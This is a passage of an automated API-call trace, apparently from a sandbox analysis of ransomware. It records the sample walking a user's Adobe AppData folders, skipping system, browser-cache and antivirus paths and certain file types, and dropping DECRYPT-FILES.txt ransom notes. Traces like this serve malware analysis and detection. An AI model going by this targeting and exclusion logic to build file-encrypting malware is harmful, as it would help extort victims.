HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" [0076.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\jkbimi8.tmp" [0076.915] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.915] CloseHandle (hObject=0x0) returned 0 [0076.915] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.916] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0a0520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.916] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0076.916] CloseHandle (hObject=0x448) returned 1 [0076.916] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0076.916] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0076.916] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0076.916] lstrcatW (in: lpString1="Headlights", lpString2="\\" | out: lpString1="Headlights\\") returned="Headlights\\" [0076.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Headlights\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Program Files") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch=":\\Windows") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Games\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\All Users") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="AhnLab") returned 0x0 [0076.916] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.917] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0076.917] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.917] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\jkbimi8.tmp") returned 75 [0076.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0076.917] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0076.917] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.917] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\DECRYPT-FILES.txt") returned 81 [0076.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0076.917] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0076.918] CloseHandle (hObject=0x44c) returned 1 [0076.918] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0076.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0076.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0076.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.919] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.919] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.919] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.919] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.919] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.919] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.919] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.919] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.919] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.919] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.919] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.919] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0076.919] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.919] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" [0076.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\jkbimi8.tmp" [0076.919] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.920] CloseHandle (hObject=0x0) returned 0 [0076.920] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.921] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.921] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0076.921] CloseHandle (hObject=0x448) returned 1 [0076.921] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.921] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.921] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.921] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.921] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.921] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.921] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.921] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0076.921] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.922] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" [0076.922] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\jkbimi8.tmp" [0076.922] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.922] CloseHandle (hObject=0x0) returned 0 [0076.922] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.922] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0076.922] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0076.922] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0076.922] lstrcatW (in: lpString1="Linguistics", lpString2="\\" | out: lpString1="Linguistics\\") returned="Linguistics\\" [0076.922] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Linguistics\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" [0076.922] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Program Files") returned 0x0 [0076.922] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch=":\\Windows") returned 0x0 [0076.922] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Games\\") returned 0x0 [0076.922] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.922] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\All Users") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="AhnLab") returned 0x0 [0076.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.923] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0076.923] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.923] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\jkbimi8.tmp") returned 76 [0076.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0076.923] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0076.923] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.923] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\DECRYPT-FILES.txt") returned 82 [0076.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0076.924] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0076.924] CloseHandle (hObject=0x44c) returned 1 [0076.925] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0076.925] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0076.925] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0076.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.925] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.925] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.925] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.925] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.925] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0076.925] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0076.925] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0076.925] lstrcatW (in: lpString1="Dictionaries", lpString2="\\" | out: lpString1="Dictionaries\\") returned="Dictionaries\\" [0076.925] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 